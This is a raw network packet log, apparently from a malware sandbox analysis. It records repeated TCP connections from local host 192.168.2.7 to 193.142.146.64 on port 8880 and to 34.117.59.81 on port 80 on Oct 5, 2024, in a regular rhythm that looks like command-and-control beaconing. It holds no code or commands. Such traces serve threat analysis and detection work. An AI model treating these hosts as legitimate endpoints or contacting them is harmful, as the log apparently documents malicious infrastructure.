                                  Oct 5, 2024 16:47:19.561669111 CEST504518880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:19.561849117 CEST504518880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:19.566731930 CEST888050451193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:20.575306892 CEST504538880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:20.917254925 CEST888050453193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:20.917397022 CEST504538880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:20.918051004 CEST5045280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:20.923326969 CEST805045234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:20.923424006 CEST5045280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:20.926151991 CEST5045480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:20.931305885 CEST805045434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:20.931490898 CEST5045480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:20.931583881 CEST5045480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:20.940208912 CEST805045434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:21.425858974 CEST805045434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:21.426156044 CEST504538880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:21.431132078 CEST888050453193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:21.431201935 CEST504538880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:21.436144114 CEST888050453193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:21.481283903 CEST5045480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:22.544359922 CEST888050453193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:22.544450045 CEST504538880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:22.544620991 CEST504538880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:22.549619913 CEST888050453193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:23.560015917 CEST504558880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:23.565006971 CEST888050455193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:23.565103054 CEST504558880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:23.655673981 CEST5045680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:23.660820007 CEST805045634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:23.661009073 CEST5045680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:23.679546118 CEST5045680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:23.684648037 CEST805045634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:24.136053085 CEST805045634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:24.136648893 CEST504558880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:24.141493082 CEST888050455193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:24.141650915 CEST504558880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:24.146553993 CEST888050455193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:24.184417963 CEST5045680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:25.221501112 CEST888050455193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:25.221674919 CEST504558880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:25.226277113 CEST504558880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:25.231137037 CEST888050455193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:26.235372066 CEST504578880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:26.240521908 CEST888050457193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:26.240648985 CEST504578880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:26.297866106 CEST5045880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:26.297952890 CEST5045680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:26.303102970 CEST805045834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:26.303210974 CEST5045880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:26.303584099 CEST805045634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:26.303648949 CEST5045680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:26.319240093 CEST5045880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:26.324275970 CEST805045834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:26.773137093 CEST805045834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:26.775782108 CEST504578880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:26.780678988 CEST888050457193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:26.780755043 CEST504578880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:26.785572052 CEST888050457193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:26.825022936 CEST5045880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:27.873677015 CEST888050457193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:27.873759985 CEST504578880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:27.873981953 CEST504578880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:27.878806114 CEST888050457193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:28.888278008 CEST504598880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:29.853388071 CEST888050459193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:29.853605986 CEST504598880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:29.875601053 CEST5046080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:29.875708103 CEST5045880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:29.880536079 CEST805046034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:29.880625010 CEST5046080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:29.880857944 CEST805045834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:29.880918026 CEST5045880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:29.884742975 CEST5046080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:29.889556885 CEST805046034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:30.381728888 CEST805046034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:30.382047892 CEST504598880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:30.387187958 CEST888050459193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:30.387264967 CEST504598880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:30.392168045 CEST888050459193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:30.434463978 CEST5046080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:31.465913057 CEST888050459193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:31.466085911 CEST504598880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:31.466264009 CEST504598880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:31.471052885 CEST888050459193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:32.488104105 CEST504618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:32.498585939 CEST888050461193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:32.498720884 CEST504618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:32.512120008 CEST5046280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:32.512202024 CEST5046080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:32.517190933 CEST805046234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:32.517297983 CEST5046280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:32.517427921 CEST5046280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:32.517474890 CEST805046034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:32.517539978 CEST5046080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:32.522289038 CEST805046234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:33.169759035 CEST805046234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:33.178252935 CEST504618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:33.183284044 CEST888050461193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:33.183372021 CEST504618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:33.188252926 CEST888050461193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:33.203136921 CEST805046234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:33.203201056 CEST5046280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:34.124001980 CEST888050461193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:34.124154091 CEST504618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:34.124289036 CEST504618880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:34.129082918 CEST888050461193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:35.137994051 CEST504638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:35.144851923 CEST888050463193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:35.144980907 CEST504638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:35.145867109 CEST5046280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:35.151243925 CEST805046234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:35.151338100 CEST5046280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:35.154558897 CEST5046480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:35.159755945 CEST805046434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:35.159993887 CEST5046480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:35.160059929 CEST5046480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:35.165108919 CEST805046434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:35.640785933 CEST805046434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:35.642425060 CEST504638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:35.647541046 CEST888050463193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:35.647614956 CEST504638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:35.652471066 CEST888050463193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:35.684545994 CEST5046480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:36.780487061 CEST888050463193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:36.780632019 CEST504638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:36.780870914 CEST504638880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:36.785952091 CEST888050463193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:37.794135094 CEST504658880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:37.799165964 CEST888050465193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:37.799247980 CEST504658880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:37.800065994 CEST5046480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:37.801074028 CEST5046680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:37.805138111 CEST805046434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:37.805219889 CEST5046480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:37.805836916 CEST805046634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:37.805915117 CEST5046680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:37.806063890 CEST5046680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:37.810914040 CEST805046634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:38.294878960 CEST805046634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:38.295133114 CEST504658880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:38.300065994 CEST888050465193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:38.300122976 CEST504658880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:38.305059910 CEST888050465193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:38.340681076 CEST5046680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:39.419354916 CEST888050465193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:39.419424057 CEST504658880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:39.419608116 CEST504658880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:39.424390078 CEST888050465193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:40.434802055 CEST504678880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:40.442785025 CEST888050467193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:40.442923069 CEST504678880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:40.443799973 CEST5046680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:40.445101023 CEST5046880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:40.450442076 CEST805046634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:40.450541019 CEST5046680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:40.451319933 CEST805046834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:40.451442957 CEST5046880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:40.452059031 CEST5046880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:40.458367109 CEST805046834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:40.928097010 CEST805046834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:40.930454969 CEST504678880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:40.935420036 CEST888050467193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:40.935509920 CEST504678880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:40.940409899 CEST888050467193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:40.996959925 CEST5046880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:42.060400963 CEST888050467193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:42.060466051 CEST504678880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:42.060736895 CEST504678880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:42.065612078 CEST888050467193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:43.075480938 CEST504698880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:43.080415964 CEST888050469193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:43.080518007 CEST504698880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:43.081850052 CEST5046880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:43.083209038 CEST5047080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:43.087502003 CEST805046834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:43.087616920 CEST5046880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:43.088104010 CEST805047034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:43.088207960 CEST5047080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:43.088505030 CEST5047080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:43.093369007 CEST805047034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:43.570760965 CEST805047034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:43.570986986 CEST504698880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:43.575961113 CEST888050469193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:43.576008081 CEST504698880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:43.580899000 CEST888050469193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:43.625845909 CEST5047080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:44.702678919 CEST888050469193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:44.702810049 CEST504698880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:44.702985048 CEST504698880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:44.707837105 CEST888050469193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:45.716147900 CEST504718880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:45.721280098 CEST888050471193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:45.721412897 CEST504718880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:45.722122908 CEST5047080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:45.722856045 CEST5047280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:45.727375984 CEST805047034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:45.727483034 CEST5047080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:45.727915049 CEST805047234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:45.727997065 CEST5047280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:45.728125095 CEST5047280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:45.732939005 CEST805047234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:46.202620983 CEST805047234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:46.203237057 CEST504718880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:46.208131075 CEST888050471193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:46.208205938 CEST504718880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:46.215255976 CEST888050471193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:46.247417927 CEST5047280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:47.429291964 CEST888050471193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:47.429374933 CEST504718880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:47.429549932 CEST504718880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:47.434334040 CEST888050471193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:48.435740948 CEST504738880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:48.442066908 CEST888050473193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:48.442203999 CEST504738880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:48.442950964 CEST5047280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:48.443598032 CEST5047480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:48.448153973 CEST805047234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:48.448496103 CEST5047280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:48.449399948 CEST805047434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:48.449480057 CEST5047480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:48.449616909 CEST5047480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:48.454406023 CEST805047434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:48.926489115 CEST805047434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:48.926985979 CEST5047480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:48.927213907 CEST504738880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:48.933895111 CEST888050473193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:48.933914900 CEST805047434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:48.934056044 CEST5047480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:48.934070110 CEST504738880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:48.941848040 CEST888050473193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:50.061603069 CEST888050473193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:50.061774969 CEST504738880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:50.063343048 CEST504738880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:50.069740057 CEST888050473193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:51.076934099 CEST504758880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:51.081912041 CEST888050475193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:51.082618952 CEST504758880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:51.085625887 CEST5047680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:51.090523005 CEST805047634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:51.090697050 CEST5047680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:51.091321945 CEST5047680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:51.096174955 CEST805047634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:51.576253891 CEST805047634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:51.576581955 CEST504758880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:51.581461906 CEST888050475193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:51.581574917 CEST504758880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:51.586369991 CEST888050475193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:51.622123957 CEST5047680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:52.702570915 CEST888050475193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:52.702820063 CEST504758880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:52.724571943 CEST504758880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:52.729582071 CEST888050475193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:53.731916904 CEST504778880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:53.736895084 CEST888050477193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:53.737039089 CEST504778880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:53.738468885 CEST5047680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:53.739907026 CEST5047880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:53.743963003 CEST805047634.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:53.744086027 CEST5047680192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:53.744756937 CEST805047834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:53.744884014 CEST5047880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:53.745146036 CEST5047880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:53.749958038 CEST805047834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:54.219775915 CEST805047834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:54.220292091 CEST504778880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:54.225127935 CEST888050477193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:54.225238085 CEST504778880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:54.230016947 CEST888050477193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:54.262761116 CEST5047880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:55.356934071 CEST888050477193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:55.357096910 CEST504778880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:55.357564926 CEST504778880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:55.362304926 CEST888050477193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:56.372380972 CEST504798880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:56.378855944 CEST888050479193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:56.379076004 CEST504798880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:56.380481005 CEST5047880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:56.381759882 CEST5048080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:56.388164043 CEST805047834.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:56.388247013 CEST5047880192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:56.388695955 CEST805048034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:56.388761044 CEST5048080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:56.388875961 CEST5048080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:56.395014048 CEST805048034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:57.013525009 CEST805048034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:57.014885902 CEST504798880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:57.019731045 CEST888050479193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:57.019804955 CEST504798880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:57.024612904 CEST888050479193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:57.059578896 CEST5048080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:58.017091990 CEST888050479193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:58.017374039 CEST504798880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:58.017705917 CEST504798880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:58.022489071 CEST888050479193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:59.033646107 CEST504818880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:59.038672924 CEST888050481193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:47:59.038917065 CEST504818880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:47:59.047637939 CEST5048080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:59.052731991 CEST805048034.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:59.052798986 CEST5048080192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:59.054945946 CEST5048280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:59.059804916 CEST805048234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:47:59.059880018 CEST5048280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:59.062292099 CEST5048280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:47:59.067094088 CEST805048234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:00.299155951 CEST805048234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:00.299403906 CEST504818880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:00.299578905 CEST805048234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:00.299638987 CEST5048280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:00.299741983 CEST805048234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:00.299784899 CEST5048280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:00.304223061 CEST888050481193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:00.304353952 CEST504818880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:00.309137106 CEST888050481193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:00.673499107 CEST888050481193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:00.673696995 CEST504818880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:00.674089909 CEST504818880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:00.679476976 CEST888050481193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:01.688294888 CEST504838880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:01.693258047 CEST888050483193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:01.693382025 CEST504838880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:01.694211006 CEST5048280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:01.694933891 CEST5048480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:01.699467897 CEST805048234.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:01.699659109 CEST5048280192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:01.699975014 CEST805048434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:01.700042963 CEST5048480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:01.714131117 CEST5048480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:01.719136000 CEST805048434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:02.192806005 CEST805048434.117.59.81192.168.2.7
                                  Oct 5, 2024 16:48:02.193048000 CEST504838880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:02.197894096 CEST888050483193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:02.197951078 CEST504838880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:02.202714920 CEST888050483193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:02.247009039 CEST5048480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:03.311130047 CEST888050483193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:03.311244011 CEST504838880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:03.311429977 CEST504838880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:03.318552971 CEST888050483193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:04.325375080 CEST504858880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:04.330435991 CEST888050485193.142.146.64192.168.2.7
                                  Oct 5, 2024 16:48:04.330598116 CEST504858880192.168.2.7193.142.146.64
                                  Oct 5, 2024 16:48:04.331206083 CEST5048480192.168.2.734.117.59.81
                                  Oct 5, 2024 16:48:04.332082987 CEST5048680192.168.2.734.117.59.81
